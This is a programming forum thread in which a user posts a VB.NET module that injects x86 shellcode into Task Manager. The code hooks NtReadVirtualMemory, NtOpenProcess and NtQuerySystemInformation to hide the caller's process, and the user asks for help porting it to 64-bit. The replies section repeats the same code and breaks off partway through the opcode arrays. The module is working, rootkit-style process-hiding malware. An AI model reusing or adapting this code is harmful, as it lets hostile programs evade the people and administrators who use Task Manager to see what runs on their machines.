none
[HELP] Make this module work on 64Bit vb.net RRS feed

  • Question

  • hi guys..

    i found VB.NET api HOOK to hide process from taskmgr

    but he just work on 32bit, can you edit it to work on 64bit?

    Module HideFromTaskMgr
    
    #Region "WinAPI's"
    
        Private Declare Function CloseHandle Lib "kernel32" (ByVal pHandle As IntPtr) As Boolean
        Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Integer, ByVal bInheritHandle As Boolean, ByVal dwProcessId As UInteger) As IntPtr
        Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, <Runtime.InteropServices.Out()> ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesRead As UInteger) As Boolean
        Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesWritten As UInteger) As Boolean
        Private Declare Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UInteger, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
    
        Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
        Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
        Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As UInteger, ByVal u32ProcessId As UInteger) As IntPtr
    
        Private Declare Function VirtualAllocEx Lib "kernel32" ( _
        ByVal hProcess As IntPtr, _
        ByVal lpAddress As IntPtr, _
        ByVal dwSize As UInteger, _
        ByVal flAllocationType As UInteger, _
        ByVal flProtect As UInteger) As IntPtr
    
    #End Region
    
    #Region "Structures"
    
        Structure MODULEENTRY32
            Dim U32Size As UInteger
            Dim Th32ModuleId As UInteger
            Dim Th32ProcessId As UInteger
            Dim GlblcntUsage As UInteger
            Dim ProccntUsage As UInteger
            Dim ModBaseAddr As IntPtr
            Dim ModBaseSize As UInteger
            Dim HModule As IntPtr
            <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=256)> Dim SzModule As String
            <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=260)> Dim SzeExePath As String
        End Structure
    
    #End Region
        Sub Main()
            HIDE_TASKMGR("taskmgr")
        End Sub
    
        Private Function ReadMemoryByte(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal nSize As UInteger) As Byte()
    
            Dim Buffer(CInt(nSize - 1)) As Byte
            ReadProcessMemory(hProcess, lpBaseAddress, Buffer, nSize, Nothing)
            Return Buffer
    
        End Function
    
        Private Function RemoteGetProcAddressManual(ByVal hProcess As IntPtr, ByVal ModuleAddress As UInteger, ByVal Export As String) As UInteger
    
            'PE Header relative declarations
            Dim PEHeaderOffset As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + &H3C, IntPtr), 4), 0)
            Dim ExportRVA As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + PEHeaderOffset + &H78, IntPtr), 4), 0)
            Dim IExportDir() As Byte = ReadMemoryByte(hProcess, CType(ModuleAddress + ExportRVA, IntPtr), 40)
            Dim NamesCnt As Integer = BitConverter.ToInt32(IExportDir, 24)
            Dim Names As UInteger = BitConverter.ToUInt32(IExportDir, 32) + ModuleAddress
            Dim FuncAddress As UInteger = BitConverter.ToUInt32(IExportDir, 28) + ModuleAddress
            Dim Ordinals As UInteger = BitConverter.ToUInt32(IExportDir, 36) + ModuleAddress
    
            'Empty declarations to use later
            Dim tpAddress, ApiAddress, Ord As UInteger
            Dim ApiString As String = Nothing
            Dim Ptr As IntPtr = Runtime.InteropServices.Marshal.AllocHGlobal(64)
    
            'Searching for the Export
            For i = 1 To NamesCnt
                tpAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(Names + ((i - 1) * 4), IntPtr), 4), 0)
                Runtime.InteropServices.Marshal.Copy(ReadMemoryByte(hProcess, CType(ModuleAddress + tpAddress, IntPtr), 64), 0, Ptr, 64)
                ApiString = Runtime.InteropServices.Marshal.PtrToStringAnsi(Ptr)
                Ord = BitConverter.ToInt16(ReadMemoryByte(hProcess, CType(Ordinals + ((i - 1) * 2), IntPtr), 2), 0)
                ApiAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(FuncAddress + (Ord * 4), IntPtr), 4), 0) + ModuleAddress
    
                If String.Compare(ApiString, Export, True) = 0 Then
                    Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
                    Return ApiAddress
                End If
    
            Next
    
            Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
            Return Nothing
    
        End Function
    
        Private Function GetModuleBaseAddress(ByVal strProcess As String, ByVal strModule As String) As IntPtr
            Dim hSnapshot As IntPtr = CreateToolhelp32Snapshot(&H18, CUInt(Diagnostics.Process.GetProcessesByName(strProcess)(0).Id))
            If hSnapshot = Nothing Then Return Nothing
            Dim me32Modules As New MODULEENTRY32
            me32Modules.U32Size = CUInt(Runtime.InteropServices.Marshal.SizeOf(me32Modules))
            If Module32First(hSnapshot, me32Modules) Then
                Do
                    If Not me32Modules.ModBaseAddr.ToInt64 > &H7FFFFFFF Then
                        If String.Compare(strModule, me32Modules.SzModule, True) = 0 Then Return me32Modules.ModBaseAddr
                    Else
                    End If
                Loop While (Module32Next(hSnapshot, me32Modules))
            End If
            Return Nothing
        End Function
    
        Private Function CalculateOffset(ByVal DesAddress As Integer, ByVal SrcAddress As Integer) As Integer
            Return (DesAddress - SrcAddress) - 5
        End Function
    
        Sub HIDE_TASKMGR(ByVal ProcessName As String)
            Const VariablesSize As Integer = 96
            Dim ProcessHandle As IntPtr
            Dim MemoryBlockPtr As UInteger
            Dim Variables() As Byte = New Byte(VariablesSize) {}
            Dim fpGetProcessId As UInteger
            Dim fpGetCurrentProcessId As UInteger
            Dim lpProtectedAddress(3) As UInteger
            Dim ProtectedBuffer(3)() As Byte
            Dim OldProtect As UInteger = Nothing
            Dim WriteOffset As UInteger = Nothing
            Dim JmpOpCode() As Byte = {&HE9, Nothing, Nothing, Nothing, Nothing}
            Dim OpCodes()() As Byte = {NtReadVirtualMemory_AsmOpCode, NtOpenProcess_AsmOpCode, NtQuerySystemInformation_AsmOpCode}
            Dim OpCodesSize As UInteger = OpCodes(0).Length + OpCodes(1).Length + OpCodes(2).Length
    
            'Alloc memory for our opcode and variables
            ProcessHandle = OpenProcess(&H8 + &H10 + &H20, False, CUInt(Diagnostics.Process.GetProcessesByName(ProcessName)(0).Id))
            MemoryBlockPtr = CInt(VirtualAllocEx(ProcessHandle, Nothing, OpCodesSize + VariablesSize, &H3000, &H40))
    
            'Fill-in variables
            fpGetProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetProcessId"))
            fpGetCurrentProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetCurrentProcessId"))
            lpProtectedAddress(0) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtReadVirtualMemory"))
            lpProtectedAddress(1) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtOpenProcess"))
            lpProtectedAddress(2) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtQuerySystemInformation"))
            ProtectedBuffer(0) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), 24)
            ProtectedBuffer(1) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), 24)
            ProtectedBuffer(2) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), 24)
            BitConverter.GetBytes(fpGetProcessId).CopyTo(Variables, 0)
            BitConverter.GetBytes(fpGetCurrentProcessId).CopyTo(Variables, 4)
            BitConverter.GetBytes(Diagnostics.Process.GetCurrentProcess.Id).CopyTo(Variables, 8)
            BitConverter.GetBytes(lpProtectedAddress(0)).CopyTo(Variables, 12)
            BitConverter.GetBytes(lpProtectedAddress(1)).CopyTo(Variables, 16)
            BitConverter.GetBytes(lpProtectedAddress(2)).CopyTo(Variables, 20)
            ProtectedBuffer(0).CopyTo(Variables, 24)
            ProtectedBuffer(1).CopyTo(Variables, 24 + 24)
            ProtectedBuffer(2).CopyTo(Variables, 24 + 24 + 24)
    
            'Write variables and opcode to memory block
            WriteOffset = MemoryBlockPtr
            WriteProcessMemory(ProcessHandle, WriteOffset, Variables, VariablesSize, Nothing)
            WriteOffset += VariablesSize
            For i = 0 To OpCodes.Length - 1
                WriteProcessMemory(ProcessHandle, WriteOffset, OpCodes(i), CUInt(OpCodes(i).Length), Nothing)
                WriteOffset += OpCodes(i).Length
            Next
    
            'Set memory page to execute code
            VirtualProtectEx(ProcessHandle, MemoryBlockPtr, OpCodesSize + VariablesSize, &H10, 0)
    
            'Hook NtReadVirtualMemory
            WriteOffset = MemoryBlockPtr + VariablesSize
            BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(0))).CopyTo(JmpOpCode, 1)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
            WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
    
            'Hook NtOpenProcess
            WriteOffset += OpCodes(0).Length
            BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(1))).CopyTo(JmpOpCode, 1)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
            WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
    
            'Hook NtQuerySystemInformation
            WriteOffset += OpCodes(1).Length
            BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(2))).CopyTo(JmpOpCode, 1)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
            WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
    
            ' clean up
            CloseHandle(ProcessHandle)
    
        End Sub
    
    #Region "AsmOpCode"
    
        Private NtReadVirtualMemory_AsmOpCode As Byte() = { _
        &H55, &H8B, &HEC, &H83, &HEC, &H14, &H56, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, _
        &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &HFF, &H75, &H18, &HFF, _
        &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, _
        &H18, &HFF, &HD0, &H89, &H45, &HF8, &H83, &H7D, &HF8, &H0, &HF, &H8C, &HA8, &H0, &H0, &H0, _
        &HFF, &H75, &H8, &H8B, &H45, &HFC, &HFF, &H10, &H8B, &HF0, &H8B, &H45, &HFC, &HFF, &H50, &H4, _
        &H3B, &HF0, &H74, &HA, &H83, &H7D, &H8, &HFF, &HF, &H85, &H8A, &H0, &H0, &H0, &H83, &H65, _
        &HF4, &H0, &HEB, &H7, &H8B, &H45, &HF4, &H40, &H89, &H45, &HF4, &H83, &H7D, &HF4, &H3, &H73, _
        &H77, &H8B, &H45, &HF4, &H8B, &H4D, &HFC, &H83, &H7C, &H81, &HC, &H0, &H74, &H65, &H8B, &H45, _
        &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H3B, &H45, &HC, &H72, &H56, &H8B, &H45, &HC, _
        &H3, &H45, &H14, &H8B, &H4D, &HF4, &H8B, &H55, &HFC, &H39, &H44, &H8A, &HC, &H73, &H44, &H8B, _
        &H45, &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H2B, &H45, &HC, &H89, &H45, &HF0, &H83, _
        &H65, &HEC, &H0, &HEB, &H7, &H8B, &H45, &HEC, &H40, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H18, _
        &H73, &H21, &H8B, &H45, &HF4, &H6B, &HC0, &H18, &H8B, &H4D, &HFC, &H8D, &H44, &H1, &H18, &H8B, _
        &H4D, &HEC, &H3, &H4D, &HF0, &H8B, &H55, &H10, &H8B, &H75, &HEC, &H8A, &H4, &H30, &H88, &H4, _
        &HA, &HEB, &HD2, &HE9, &H7C, &HFF, &HFF, &HFF, &H8B, &H45, &HF8, &H5E, &HC9, &HC2, &H14, &H0}
    
        Private NtOpenProcess_AsmOpCode As Byte() = { _
        &H55, &H8B, &HEC, &H51, &H51, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, &H0, &H0, _
        &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &H83, &H7D, &H14, &H0, &H74, &H16, _
        &H8B, &H45, &H14, &H8B, &H4D, &HFC, &H8B, &H0, &H3B, &H41, &H8, &H75, &H9, &HC7, &H45, &HF8, _
        &H22, &H0, &H0, &HC0, &HEB, &H17, &HFF, &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, _
        &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, &H30, &HFF, &HD0, &H89, &H45, &HF8, &H8B, &H45, &HF8, _
        &HC9, &HC2, &H10, &H0}
    
        Private NtQuerySystemInformation_AsmOpCode As Byte() = { _
        &H55, &H8B, &HEC, &H83, &HEC, &H1C, &H56, &H57, &HC7, &H45, &HEC, &H1, &H0, &H0, &HC0, &HE8, _
        &H0, &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HF0, &HFF, &H75, &H14, _
        &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HF0, &H83, &HC0, &H48, &HFF, _
        &HD0, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H0, &HF, &H8C, &H4E, &H1, &H0, &H0, &H83, &H7D, _
        &H8, &H5, &H75, &H5D, &H83, &H65, &HF8, &H0, &H8B, &H45, &HC, &H89, &H45, &HF4, &H8B, &H45, _
        &HF4, &H83, &H38, &H0, &H74, &H46, &H8B, &H45, &HF4, &H89, &H45, &HF8, &H8B, &H45, &HF8, &H8B, _
        &H4D, &HF8, &H3, &H8, &H89, &H4D, &HF4, &H8B, &H45, &HF4, &H8B, &H4D, &HF0, &H8B, &H40, &H44, _
        &H3B, &H41, &H8, &H75, &H25, &H8B, &H45, &HF4, &H83, &H38, &H0, &H75, &H8, &H8B, &H45, &HF8, _
        &H83, &H20, &H0, &HEB, &HF, &H8B, &H45, &HF8, &H8B, &H0, &H8B, &H4D, &HF4, &H3, &H1, &H8B, _
        &H4D, &HF8, &H89, &H1, &H8B, &H45, &HF8, &H89, &H45, &HF4, &HEB, &HB2, &HE9, &HEB, &H0, &H0, _
        &H0, &H83, &H7D, &H8, &H10, &HF, &H85, &HE1, &H0, &H0, &H0, &H8B, &H45, &HC, &H89, &H45, _
        &HFC, &H83, &H65, &HE8, &H0, &HEB, &H7, &H8B, &H45, &HE8, &H40, &H89, &H45, &HE8, &H8B, &H45, _
        &HFC, &H8B, &H4D, &HE8, &H3B, &H8, &HF, &H83, &HC0, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, _
        &HE0, &H4, &H8B, &H4D, &HFC, &H8B, &H55, &HF0, &H8B, &H44, &H1, &H4, &H3B, &H42, &H8, &HF, _
        &H85, &HA2, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, _
        &H1, &H9, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H10, _
        &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H33, &HC9, &H8B, &H55, &HFC, &H66, &H89, &H4C, &H2, _
        &HA, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &HC, &H0, &H8B, _
        &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, &H1, &H8, &H0, &H8B, &H45, &HE8, _
        &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H4, &H0, &H8B, &H45, &HE8, &H89, &H45, _
        &HE4, &HEB, &H7, &H8B, &H45, &HE4, &H40, &H89, &H45, &HE4, &H8B, &H45, &HFC, &H8B, &H4D, &HE4, _
        &H3B, &H8, &H73, &H21, &H8B, &H45, &HE4, &H40, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H74, _
        &H1, &H4, &H8B, &H45, &HE4, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H7C, &H1, &H4, &HA5, _
        &HA5, &HA5, &HA5, &HEB, &HCE, &H8B, &H45, &HFC, &H8B, &H0, &H48, &H8B, &H4D, &HFC, &H89, &H1, _
        &H8B, &H45, &HE8, &H48, &H89, &H45, &HE8, &HE9, &H2B, &HFF, &HFF, &HFF, &H8B, &H45, &HEC, &H5F, _
        &H5E, &HC9, &HC2, &H10, &H0}
    
    #End Region
    
    End Module

    • Moved by Stanly Fan Friday, June 23, 2017 2:08 AM from windows form general
    Thursday, June 22, 2017 9:46 AM

All replies

  • hi guys..

    i found VB.NET api HOOK to hide process from taskmgr

    but he just work on 32bit, can you edit it to work on 64bit?

    Module HideFromTaskMgr
    
    #Region "WinAPI's"
    
        Private Declare Function CloseHandle Lib "kernel32" (ByVal pHandle As IntPtr) As Boolean
        Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Integer, ByVal bInheritHandle As Boolean, ByVal dwProcessId As UInteger) As IntPtr
        Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, <Runtime.InteropServices.Out()> ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesRead As UInteger) As Boolean
        Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesWritten As UInteger) As Boolean
        Private Declare Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UInteger, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean
    
        Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
        Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
        Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As UInteger, ByVal u32ProcessId As UInteger) As IntPtr
    
        Private Declare Function VirtualAllocEx Lib "kernel32" ( _
        ByVal hProcess As IntPtr, _
        ByVal lpAddress As IntPtr, _
        ByVal dwSize As UInteger, _
        ByVal flAllocationType As UInteger, _
        ByVal flProtect As UInteger) As IntPtr
    
    #End Region
    
    #Region "Structures"
    
        Structure MODULEENTRY32
            Dim U32Size As UInteger
            Dim Th32ModuleId As UInteger
            Dim Th32ProcessId As UInteger
            Dim GlblcntUsage As UInteger
            Dim ProccntUsage As UInteger
            Dim ModBaseAddr As IntPtr
            Dim ModBaseSize As UInteger
            Dim HModule As IntPtr
            <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=256)> Dim SzModule As String
            <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=260)> Dim SzeExePath As String
        End Structure
    
    #End Region
        Sub Main()
            HIDE_TASKMGR("taskmgr")
        End Sub
    
        Private Function ReadMemoryByte(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal nSize As UInteger) As Byte()
    
            Dim Buffer(CInt(nSize - 1)) As Byte
            ReadProcessMemory(hProcess, lpBaseAddress, Buffer, nSize, Nothing)
            Return Buffer
    
        End Function
    
        Private Function RemoteGetProcAddressManual(ByVal hProcess As IntPtr, ByVal ModuleAddress As UInteger, ByVal Export As String) As UInteger
    
            'PE Header relative declarations
            Dim PEHeaderOffset As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + &H3C, IntPtr), 4), 0)
            Dim ExportRVA As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + PEHeaderOffset + &H78, IntPtr), 4), 0)
            Dim IExportDir() As Byte = ReadMemoryByte(hProcess, CType(ModuleAddress + ExportRVA, IntPtr), 40)
            Dim NamesCnt As Integer = BitConverter.ToInt32(IExportDir, 24)
            Dim Names As UInteger = BitConverter.ToUInt32(IExportDir, 32) + ModuleAddress
            Dim FuncAddress As UInteger = BitConverter.ToUInt32(IExportDir, 28) + ModuleAddress
            Dim Ordinals As UInteger = BitConverter.ToUInt32(IExportDir, 36) + ModuleAddress
    
            'Empty declarations to use later
            Dim tpAddress, ApiAddress, Ord As UInteger
            Dim ApiString As String = Nothing
            Dim Ptr As IntPtr = Runtime.InteropServices.Marshal.AllocHGlobal(64)
    
            'Searching for the Export
            For i = 1 To NamesCnt
                tpAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(Names + ((i - 1) * 4), IntPtr), 4), 0)
                Runtime.InteropServices.Marshal.Copy(ReadMemoryByte(hProcess, CType(ModuleAddress + tpAddress, IntPtr), 64), 0, Ptr, 64)
                ApiString = Runtime.InteropServices.Marshal.PtrToStringAnsi(Ptr)
                Ord = BitConverter.ToInt16(ReadMemoryByte(hProcess, CType(Ordinals + ((i - 1) * 2), IntPtr), 2), 0)
                ApiAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(FuncAddress + (Ord * 4), IntPtr), 4), 0) + ModuleAddress
    
                If String.Compare(ApiString, Export, True) = 0 Then
                    Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
                    Return ApiAddress
                End If
    
            Next
    
            Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
            Return Nothing
    
        End Function
    
        Private Function GetModuleBaseAddress(ByVal strProcess As String, ByVal strModule As String) As IntPtr
            Dim hSnapshot As IntPtr = CreateToolhelp32Snapshot(&H18, CUInt(Diagnostics.Process.GetProcessesByName(strProcess)(0).Id))
            If hSnapshot = Nothing Then Return Nothing
            Dim me32Modules As New MODULEENTRY32
            me32Modules.U32Size = CUInt(Runtime.InteropServices.Marshal.SizeOf(me32Modules))
            If Module32First(hSnapshot, me32Modules) Then
                Do
                    If Not me32Modules.ModBaseAddr.ToInt64 > &H7FFFFFFF Then
                        If String.Compare(strModule, me32Modules.SzModule, True) = 0 Then Return me32Modules.ModBaseAddr
                    Else
                    End If
                Loop While (Module32Next(hSnapshot, me32Modules))
            End If
            Return Nothing
        End Function
    
        Private Function CalculateOffset(ByVal DesAddress As Integer, ByVal SrcAddress As Integer) As Integer
            Return (DesAddress - SrcAddress) - 5
        End Function
    
        Sub HIDE_TASKMGR(ByVal ProcessName As String)
            Const VariablesSize As Integer = 96
            Dim ProcessHandle As IntPtr
            Dim MemoryBlockPtr As UInteger
            Dim Variables() As Byte = New Byte(VariablesSize) {}
            Dim fpGetProcessId As UInteger
            Dim fpGetCurrentProcessId As UInteger
            Dim lpProtectedAddress(3) As UInteger
            Dim ProtectedBuffer(3)() As Byte
            Dim OldProtect As UInteger = Nothing
            Dim WriteOffset As UInteger = Nothing
            Dim JmpOpCode() As Byte = {&HE9, Nothing, Nothing, Nothing, Nothing}
            Dim OpCodes()() As Byte = {NtReadVirtualMemory_AsmOpCode, NtOpenProcess_AsmOpCode, NtQuerySystemInformation_AsmOpCode}
            Dim OpCodesSize As UInteger = OpCodes(0).Length + OpCodes(1).Length + OpCodes(2).Length
    
            'Alloc memory for our opcode and variables
            ProcessHandle = OpenProcess(&H8 + &H10 + &H20, False, CUInt(Diagnostics.Process.GetProcessesByName(ProcessName)(0).Id))
            MemoryBlockPtr = CInt(VirtualAllocEx(ProcessHandle, Nothing, OpCodesSize + VariablesSize, &H3000, &H40))
    
            'Fill-in variables
            fpGetProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetProcessId"))
            fpGetCurrentProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetCurrentProcessId"))
            lpProtectedAddress(0) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtReadVirtualMemory"))
            lpProtectedAddress(1) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtOpenProcess"))
            lpProtectedAddress(2) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtQuerySystemInformation"))
            ProtectedBuffer(0) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), 24)
            ProtectedBuffer(1) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), 24)
            ProtectedBuffer(2) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), 24)
            BitConverter.GetBytes(fpGetProcessId).CopyTo(Variables, 0)
            BitConverter.GetBytes(fpGetCurrentProcessId).CopyTo(Variables, 4)
            BitConverter.GetBytes(Diagnostics.Process.GetCurrentProcess.Id).CopyTo(Variables, 8)
            BitConverter.GetBytes(lpProtectedAddress(0)).CopyTo(Variables, 12)
            BitConverter.GetBytes(lpProtectedAddress(1)).CopyTo(Variables, 16)
            BitConverter.GetBytes(lpProtectedAddress(2)).CopyTo(Variables, 20)
            ProtectedBuffer(0).CopyTo(Variables, 24)
            ProtectedBuffer(1).CopyTo(Variables, 24 + 24)
            ProtectedBuffer(2).CopyTo(Variables, 24 + 24 + 24)
    
            'Write variables and opcode to memory block
            WriteOffset = MemoryBlockPtr
            WriteProcessMemory(ProcessHandle, WriteOffset, Variables, VariablesSize, Nothing)
            WriteOffset += VariablesSize
            For i = 0 To OpCodes.Length - 1
                WriteProcessMemory(ProcessHandle, WriteOffset, OpCodes(i), CUInt(OpCodes(i).Length), Nothing)
                WriteOffset += OpCodes(i).Length
            Next
    
            'Set memory page to execute code
            VirtualProtectEx(ProcessHandle, MemoryBlockPtr, OpCodesSize + VariablesSize, &H10, 0)
    
            'Hook NtReadVirtualMemory
            WriteOffset = MemoryBlockPtr + VariablesSize
            BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(0))).CopyTo(JmpOpCode, 1)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
            WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
    
            'Hook NtOpenProcess
            WriteOffset += OpCodes(0).Length
            BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(1))).CopyTo(JmpOpCode, 1)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
            WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
    
            'Hook NtQuerySystemInformation
            WriteOffset += OpCodes(1).Length
            BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(2))).CopyTo(JmpOpCode, 1)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
            WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
            VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)
    
            ' clean up
            CloseHandle(ProcessHandle)
    
        End Sub
    
    #Region "AsmOpCode"
    
        Private NtReadVirtualMemory_AsmOpCode As Byte() = { _
        &H55, &H8B, &HEC, &H83, &HEC, &H14, &H56, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, _
